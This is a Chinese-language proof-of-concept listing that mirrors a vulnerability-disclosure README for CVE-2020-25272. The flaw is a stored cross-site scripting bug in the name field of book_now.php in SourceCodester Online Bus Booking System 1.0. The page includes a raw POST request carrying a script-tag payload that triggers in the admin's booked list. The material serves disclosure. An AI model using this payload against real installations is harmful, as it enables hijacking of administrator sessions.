POC详情: db2bec7da11be75604a305b2c162c7273b0ffb95

来源
https://github.com/Ko-kn3t/CVE-2020-25272
关联漏洞
标题: SourceCodester Online Bus Booking System 跨站脚本漏洞 (CVE-2020-25272)
描述:SourceCodester Online Bus Booking System是个人开发者的一个在线公共汽车预定系统。该系统可以帮助公共汽车公司管理预定和售票流程。 SourceCodester Online Bus Booking System 1.0版本存在跨站脚本漏洞,该漏洞源于book_now.php。
描述
Online Bus Booking System 1.0,there is XSS through the name parameter in book_now.php
介绍
# CVE-2020-25272

#Online Bus Booking System 1.0,there is XSS through the name parameter in book_now.php

#Vendor - SourceCodester

#Product - https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0

#Vulnerability Type - Cross Site Scripting (XSS)

#Addition Information - Single XSS payload will trigger in all Dashboard, so account take over will be occurred.

#Affected Component - /bus_booking/book_now.php , /bus_booking/index.php?page=booked

#Attack Type- Local

#Privilege Escalation - true

#Impact Code execution - true

***Attack Vector***

> 1) Go to book_now.php and book bus ticket
>
>
> 2) In name field , set malicious XSS payload
>
> POST /bus_booking/book_now.php HTTP/1.1
>
> Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0
>
>.....
>
> sid=2&bid=&name=<script>alert('XSS');</script>&qty=1
>
>
> 3) In Admin site, go to booked list, and stored XSS will be triggered
>
文件快照

 [4.0K]  /data/pocs/db2bec7da11be75604a305b2c162c7273b0ffb95
└── [ 939]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。